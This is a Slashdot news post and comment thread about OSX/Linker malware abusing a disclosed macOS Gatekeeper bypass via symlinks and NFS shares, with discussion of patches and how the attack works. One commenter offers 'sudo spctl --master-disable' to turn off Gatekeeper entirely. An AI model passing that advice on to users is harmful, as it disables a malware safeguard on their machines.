New Mac Malware Abuses Recently Disclosed Gatekeeper Zero-Day (zdnet.com) 53
puddingebola writes: In May, security researcher Filippo Cavallarin made public a vulnerability in macOS's Gatekeeper. The vulnerability can allow an attacker to use a symlink and an NFS server to bypass Gatekeepers authentication and run malicious code. The malware has been named OSX/Linker and has been tied to the same group that operates the OSX/Surfbuyer adware. All macOS versions are affected, including the latest 10.14.5, and Apple has yet to release a patch to this day, a full month after Cavallarin's public disclosure.
Old versions? (Score:3)
My big question is whether there will be a patch available on older versions that are no longer supported. I have a couple of old MacBooks which haven't been supported in several years but are still functional. I wonder whether Apple will do the right thing. Probably not. I don't have the courage to throw away a working piece of equipment and buy something with sticky keys.
Re: Old versions? (Score:1)
I'm afraid you'll have to buy a new mac to get support. Or do the right thing and put linux in your mac.
Re: (Score:2)
Good luck with that as the T2 Macs come off OS support. The chip doesn't allow Linux to see the internal SSD, even when set on "Low security". Your only real alternative will be Windows.
Re: Old versions? (Score:1)
Talk about simplicity. It would appear much much later in the process, if at all. Door is closing.
Re: Old versions? (Score:1)
I have a couple of 2008 maxed out iMacs and I'm loath to retire them.
Firewalled them from the external network. It's not perfect, but it keeps them running.
Rock solid stable, why should I mess with them?
Re: (Score:3)
Early-2008 or newer Mac Pro, iMac, or MacBook Pro:
MacPro3,1
MacPro4,1 iMac8,1
iMac9,1
iMac10,x
iMac11,x (systems with AMD Radeon HD 5xxx and 6xxx series GPUs will be almost unusable when running Mojave)
iMac12,x (systems with AMD Radeon HD 5xxx and 6xxx series GPUs will be almost unusable when running Mojave.)
Re: (Score:2)
They just recently patched [apple.com] the entire discontinued AirPort base station line with updated firmware to address security issues, so I don't see why they wouldn't do this for macOS which is still an active product.
Just don't us don't mount an nfs share (Score:2)
Or if you must mount only the parts of it you trust.
How many people realistically mount nfs shares these days on macs?
Even when you might usually the server supports a protocol like SMB or Apple's File system.
Re: (Score:2)
- Early-2008 or newer Mac Pro, iMac, or MacBook Pro
- Late-2008 or newer MacBook Air or Aluminum Unibody MacBook:
- Early-2009 or newer Mac Mini or white MacBook:
- Early-2008 or newer Xserve:
If your mac is old but not too old, you can still get unofficial support through our hero, DosDude1
Want to bypass gatekeeper auth? Simple... (Score:2, Interesting)
Install from the command line. Gatekeeper is just a nanny program for the plebs - a security hole wont be relevant to power users anyway.
Re:Want to bypass gatekeeper auth? Simple... (Score:4, Insightful)
What does your incoherent mumbling “install from the commandine“ even mean, in your head?
Re: Want to bypass gatekeeper auth? Simple... (Score:1)
What do you mean? Brew?
Re: (Score:2)
Yes, brew or just download a tgz, zip or binary direct using scp, curl or similar.
Re: (Score:2)
Why wouldn't it do it correctly? And if installs fail you sort them out. Its not rocket science.
Re: (Score:2)
As long as you're in Terminal,
sudo spctl --master-disable
OS/X default is to automatically mount NFS shares? (Score:3)
Does OS/X mount NFS shares automatically by default? Or is it that the installer application is doing that unbeknownst to the victim?
You have to mount it (Score:2)
You are right, you have to mount an NFS share. I'm not sure an application can even have permission to do that...
One other thought is, what is Gatekeeper even supposed to do about this? Scan the file and the remote end and see if it's dangerous - even though if it's not at any time later it could easily be replaced by something it is?
Maybe by default a good OS choice is to make a user enable cross-network symbolic links...
Re: (Score:2)
The ideal is that anything GateKeeper is executing gets checked for a signature, or if it doesn't have one, some manifest file with a hash of the executable is stored so if a user allowed "foo" to run, if "foo" gets changed, it would either deny executing, or tell the user.
Re: (Score:2)
I get that the zip file creates a symlink to an NFS mounted share, but I don't understand how the NFS share got mounted in the first place.
I know for SMB and AFS shares, if you have an Alias on your desktop (or anywhere else) to a folder on a shared drive, the OS will automatically mount that shared drive when you double-click on the Alias. I suspect it works the same for NFS shares.
Thus, if your installer creates an alias called "catpic.jpg" on your desktop to an entity that exists on a shared drive, when you try to open the file the OS will auto-mount the share, and then load the file as appropriate. It's still in response to user interacti
Seems pretty roundabout (Score:2, Interesting)
So a user would have to download an app with a symlink in the package, where Gatekeeper would overlook a symbolic link to a network share....
How is it going to reach that network share? Does that have to be local?
Then the user also has to execute the symlink, why would they?
It's probably good to fix but I seriously doubt we'll see anyone affected.
Temporary fix (Score:2)
It's not a zero-day (Score:4, Informative)
It was a zero-day, but now it is just a vulnerability, much in the way that today is tomorrow's yesterday.
Re: (Score:2)
What makes a vulnerability a "zero-day" is exploitation before a patch becomes available.